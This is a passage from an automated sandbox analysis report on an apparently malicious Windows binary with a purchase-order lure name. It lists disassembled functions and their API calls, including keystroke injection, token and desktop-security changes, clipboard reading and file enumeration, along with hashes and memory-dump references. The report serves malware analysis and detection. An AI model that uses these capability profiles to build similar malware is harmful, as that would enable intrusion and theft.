                                  • Part of subcall function 00155745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0015949C,?,00008000), ref: 00155773
                                • GetLastError.KERNEL32(00000002,00000000), ref: 001C76DE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateErrorFileLast
                                • String ID:
                                • API String ID: 1214770103-0
                                • Opcode ID: 50fe5e2f6549a213938f9d27d8ce114564a5b67957587d819d0ca61c3b3fcb63
                                • Instruction ID: 3c01f7b87100c6e5047470e5d5a009fad584682f0d32c46d6e9139e1feb41262
                                • Opcode Fuzzy Hash: 50fe5e2f6549a213938f9d27d8ce114564a5b67957587d819d0ca61c3b3fcb63
                                • Instruction Fuzzy Hash: 98816A30608701DFCB14EF28C491B69B7E1AFA9315F04451DF8AA5B2A2DB70ED49CF92
                                Function 00156246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNELBASE(?,?,00000000,001924E0), ref: 00156266
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 5f9770a1e9a0d5798783402af04712fb0198edf1d06eab452319a6872e5c675a
                                • Instruction ID: 407ced465182b985a460cf311753b8876f8a6ef6fdd5986af88028dcb0242020
                                • Opcode Fuzzy Hash: 5f9770a1e9a0d5798783402af04712fb0198edf1d06eab452319a6872e5c675a
                                • Instruction Fuzzy Hash: 80E0B675400B01CFC3318F1AE804412FBF5FFE13623214A2ED8F69A660D3B0588A8F90
                                Function 036DF700 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 036DF711
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction ID: d06016b1b26ff16bed0cf6a69704514374240fee6b475e8d81042ec33b03581f
                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction Fuzzy Hash: 6BE0E67494010DDFDB00EFB8D54D6DE7FB4EF04301F1001A1FD01D2280D6319D508A62

                                Non-executed Functions

                                Function 001E9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001E961A
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001E965B
                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001E969F
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001E96C9
                                • SendMessageW.USER32 ref: 001E96F2
                                • GetKeyState.USER32(00000011), ref: 001E978B
                                • GetKeyState.USER32(00000009), ref: 001E9798
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001E97AE
                                • GetKeyState.USER32(00000010), ref: 001E97B8
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001E97E9
                                • SendMessageW.USER32 ref: 001E9810
                                • SendMessageW.USER32(?,00001030,?,001E7E95), ref: 001E9918
                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001E992E
                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001E9941
                                • SetCapture.USER32(?), ref: 001E994A
                                • ClientToScreen.USER32(?,?), ref: 001E99AF
                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001E99BC
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001E99D6
                                • ReleaseCapture.USER32 ref: 001E99E1
                                • GetCursorPos.USER32(?), ref: 001E9A19
                                • ScreenToClient.USER32(?,?), ref: 001E9A26
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001E9A80
                                • SendMessageW.USER32 ref: 001E9AAE
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001E9AEB
                                • SendMessageW.USER32 ref: 001E9B1A
                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001E9B3B
                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001E9B4A
                                • GetCursorPos.USER32(?), ref: 001E9B68
                                • ScreenToClient.USER32(?,?), ref: 001E9B75
                                • GetParent.USER32(?), ref: 001E9B93
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001E9BFA
                                • SendMessageW.USER32 ref: 001E9C2B
                                • ClientToScreen.USER32(?,?), ref: 001E9C84
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001E9CB4
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001E9CDE
                                • SendMessageW.USER32 ref: 001E9D01
                                • ClientToScreen.USER32(?,?), ref: 001E9D4E
                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001E9D82
                                  • Part of subcall function 00169944: GetWindowLongW.USER32(?,000000EB), ref: 00169952
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E9E05
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                • String ID: @GUI_DRAGID$F$p#"
                                • API String ID: 3429851547-1047118953
                                • Opcode ID: 7c7c4c579d1bf95f24224205720e7e107deeda4b4aef068e47f0d70e960e33b0
                                • Instruction ID: 279d97150fe9a2c962686be5d7b86b5a0e154bd01ffcf9c16e3175b489333b5b
                                • Opcode Fuzzy Hash: 7c7c4c579d1bf95f24224205720e7e107deeda4b4aef068e47f0d70e960e33b0
                                • Instruction Fuzzy Hash: 91428C70604680AFD724CF66CC84EAEBBF5FF49310F14061AFA598B2A1D77198A5CF81
                                Function 001E4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001E48F3
                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001E4908
                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001E4927
                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001E494B
                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001E495C
                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001E497B
                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001E49AE
                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001E49D4
                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001E4A0F
                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001E4A56
                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001E4A7E
                                • IsMenu.USER32(?), ref: 001E4A97
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E4AF2
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E4B20
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E4B94
                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001E4BE3
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001E4C82
                                • wsprintfW.USER32 ref: 001E4CAE
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001E4CC9
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001E4CF1
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001E4D13
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001E4D33
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001E4D5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                • String ID: %d/%02d/%02d
                                • API String ID: 4054740463-328681919
                                • Opcode ID: a135c743406147cebc0bb08844d912ae0038f4028edfe287bd19977c81c8c6d5
                                • Instruction ID: 79083e14ba169be7842d394b5b2c23bfa05bba7b125f48832ccfb2d3e4092715
                                • Opcode Fuzzy Hash: a135c743406147cebc0bb08844d912ae0038f4028edfe287bd19977c81c8c6d5
                                • Instruction Fuzzy Hash: 9912F231A00684ABEB248F69DC49FAF7BF8EF49710F144129F916EB2E1D7749941CB50
                                Function 0016F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0016F998
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001AF474
                                • IsIconic.USER32(00000000), ref: 001AF47D
                                • ShowWindow.USER32(00000000,00000009), ref: 001AF48A
                                • SetForegroundWindow.USER32(00000000), ref: 001AF494
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001AF4AA
                                • GetCurrentThreadId.KERNEL32 ref: 001AF4B1
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001AF4BD
                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 001AF4CE
                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 001AF4D6
                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 001AF4DE
                                • SetForegroundWindow.USER32(00000000), ref: 001AF4E1
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF4F6
                                • keybd_event.USER32(00000012,00000000), ref: 001AF501
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF50B
                                • keybd_event.USER32(00000012,00000000), ref: 001AF510
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF519
                                • keybd_event.USER32(00000012,00000000), ref: 001AF51E
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF528
                                • keybd_event.USER32(00000012,00000000), ref: 001AF52D
                                • SetForegroundWindow.USER32(00000000), ref: 001AF530
                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 001AF557
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                • String ID: Shell_TrayWnd
                                • API String ID: 4125248594-2988720461
                                • Opcode ID: 1a57ac36e70ee863361d0286729292ccb6460a3fcfcb008be90bd732da5a462b
                                • Instruction ID: 69f32ccf145a88b4cdcabd124d56a2d5d4e21a39452486ed25d48656a4cbcedd
                                • Opcode Fuzzy Hash: 1a57ac36e70ee863361d0286729292ccb6460a3fcfcb008be90bd732da5a462b
                                • Instruction Fuzzy Hash: 79314175B40258BFEB206BE55C89FBF7E6DEB45B50F100029FA00EA1D1C7B05942AAA0
                                Function 001B1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001B170D
                                  • Part of subcall function 001B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001B173A
                                  • Part of subcall function 001B16C3: GetLastError.KERNEL32 ref: 001B174A
                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001B1286
                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001B12A8
                                • CloseHandle.KERNEL32(?), ref: 001B12B9
                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001B12D1
                                • GetProcessWindowStation.USER32 ref: 001B12EA
                                • SetProcessWindowStation.USER32(00000000), ref: 001B12F4
                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001B1310
                                  • Part of subcall function 001B10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001B11FC), ref: 001B10D4
                                  • Part of subcall function 001B10BF: CloseHandle.KERNEL32(?,?,001B11FC), ref: 001B10E9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                • String ID: $default$winsta0$Z!
                                • API String ID: 22674027-3215132610
                                • Opcode ID: 99ac0442ef1798db2229a49fcacad324f5f92270d904ea22fe0f41967d44c20b
                                • Instruction ID: 9105ee5edfa453d83b831d06af66bc9ea284ba980c8a85a69b11ae768dd9df97
                                • Opcode Fuzzy Hash: 99ac0442ef1798db2229a49fcacad324f5f92270d904ea22fe0f41967d44c20b
                                • Instruction Fuzzy Hash: F6818B71900249BFDF219FA4DC99FEE7BB9FF08704F154129F910A62A0DB718A95CB60
                                Function 001B0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001B1114
                                  • Part of subcall function 001B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1120
                                  • Part of subcall function 001B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B112F
                                  • Part of subcall function 001B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1136
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001B114D
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001B0BCC
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001B0C00
                                • GetLengthSid.ADVAPI32(?), ref: 001B0C17
                                • GetAce.ADVAPI32(?,00000000,?), ref: 001B0C51
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001B0C6D
                                • GetLengthSid.ADVAPI32(?), ref: 001B0C84
                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001B0C8C
                                • HeapAlloc.KERNEL32(00000000), ref: 001B0C93
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001B0CB4
                                • CopySid.ADVAPI32(00000000), ref: 001B0CBB
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001B0CEA
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001B0D0C
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001B0D1E
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0D45
                                • HeapFree.KERNEL32(00000000), ref: 001B0D4C
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0D55
                                • HeapFree.KERNEL32(00000000), ref: 001B0D5C
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0D65
                                • HeapFree.KERNEL32(00000000), ref: 001B0D6C
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 001B0D78
                                • HeapFree.KERNEL32(00000000), ref: 001B0D7F
                                  • Part of subcall function 001B1193: GetProcessHeap.KERNEL32(00000008,001B0BB1,?,00000000,?,001B0BB1,?), ref: 001B11A1
                                  • Part of subcall function 001B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001B0BB1,?), ref: 001B11A8
                                  • Part of subcall function 001B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001B0BB1,?), ref: 001B11B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                • String ID:
                                • API String ID: 4175595110-0
                                • Opcode ID: 424fbaa48e33db09396dd5ce3b43a5bd04a0ec4b881c71cf12a0398e6243f98d
                                • Instruction ID: e85c926202946918aaaaf372646a74cb385abfe11c4194fb40c47030a80f5435
                                • Opcode Fuzzy Hash: 424fbaa48e33db09396dd5ce3b43a5bd04a0ec4b881c71cf12a0398e6243f98d
                                • Instruction Fuzzy Hash: B2716B7690020AABDF11DFE4DC84BEFBBB8BF09310F044515F915AA1A1D771AA46CBA0
                                Function 001CEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(001ECC08), ref: 001CEB29
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 001CEB37
                                • GetClipboardData.USER32(0000000D), ref: 001CEB43
                                • CloseClipboard.USER32 ref: 001CEB4F
                                • GlobalLock.KERNEL32(00000000), ref: 001CEB87
                                • CloseClipboard.USER32 ref: 001CEB91
                                • GlobalUnlock.KERNEL32(00000000), ref: 001CEBBC
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 001CEBC9
                                • GetClipboardData.USER32(00000001), ref: 001CEBD1
                                • GlobalLock.KERNEL32(00000000), ref: 001CEBE2
                                • GlobalUnlock.KERNEL32(00000000), ref: 001CEC22
                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 001CEC38
                                • GetClipboardData.USER32(0000000F), ref: 001CEC44
                                • GlobalLock.KERNEL32(00000000), ref: 001CEC55
                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001CEC77
                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001CEC94
                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001CECD2
                                • GlobalUnlock.KERNEL32(00000000), ref: 001CECF3
                                • CountClipboardFormats.USER32 ref: 001CED14
                                • CloseClipboard.USER32 ref: 001CED59
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                • String ID:
                                • API String ID: 420908878-0
                                • Opcode ID: 3fa127d3b071b0cdee6813af2fdf217bb8de672520feed363cba390c4ee90b52
                                • Instruction ID: b52ee8486c02a4bbff46c1c70372c36913a94d289e6207ee75a2f7f202f06d9e
                                • Opcode Fuzzy Hash: 3fa127d3b071b0cdee6813af2fdf217bb8de672520feed363cba390c4ee90b52
                                • Instruction Fuzzy Hash: 2B619D342042429FD310EFA4DC85F7A77E4AFA4714F14451DF8669B2A2DB31DD8ACBA2
                                Function 001C698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 001C69BE
                                • FindClose.KERNEL32(00000000), ref: 001C6A12
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001C6A4E
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001C6A75
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001C6AB2
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001C6ADF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                • API String ID: 3830820486-3289030164
                                • Opcode ID: 3c206e481cd911739daa3c373707ecef4cd55955af9806c6fd752ca51386184f
                                • Instruction ID: ede99f6efc3b507eb69c58265ab1bb8cc1c1694130bedb3542276015a1c5e269
                                • Opcode Fuzzy Hash: 3c206e481cd911739daa3c373707ecef4cd55955af9806c6fd752ca51386184f
                                • Instruction Fuzzy Hash: 0DD15071508300AEC314DBA4DC82EAFB7E8AFA8705F44491DF995CB191EB74DA48C7A2
                                Function 001C9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001C9663
                                • GetFileAttributesW.KERNEL32(?), ref: 001C96A1
                                • SetFileAttributesW.KERNEL32(?,?), ref: 001C96BB
                                • FindNextFileW.KERNEL32(00000000,?), ref: 001C96D3
                                • FindClose.KERNEL32(00000000), ref: 001C96DE
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 001C96FA
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C974A
                                • SetCurrentDirectoryW.KERNEL32(00216B7C), ref: 001C9768
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C9772
                                • FindClose.KERNEL32(00000000), ref: 001C977F
                                • FindClose.KERNEL32(00000000), ref: 001C978F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                • String ID: *.*
                                • API String ID: 1409584000-438819550
                                • Opcode ID: a0875ab335729fed06abc33b7698cacb29cdcf37b3b4eb0621efc9c2fbb20c7d
                                • Instruction ID: 55954cf24a365900b1bbc544dc4939497ab7b6ea0c1479575ac82afad1bc5e79
                                • Opcode Fuzzy Hash: a0875ab335729fed06abc33b7698cacb29cdcf37b3b4eb0621efc9c2fbb20c7d
                                • Instruction Fuzzy Hash: 2731DF3254125AAACB14AFF4DC4DEDE77ACAF19320F104059E914E60A0DB70DE818E94
                                Function 001C979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001C97BE
                                • FindNextFileW.KERNEL32(00000000,?), ref: 001C9819
                                • FindClose.KERNEL32(00000000), ref: 001C9824
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 001C9840
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C9890
                                • SetCurrentDirectoryW.KERNEL32(00216B7C), ref: 001C98AE
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C98B8
                                • FindClose.KERNEL32(00000000), ref: 001C98C5
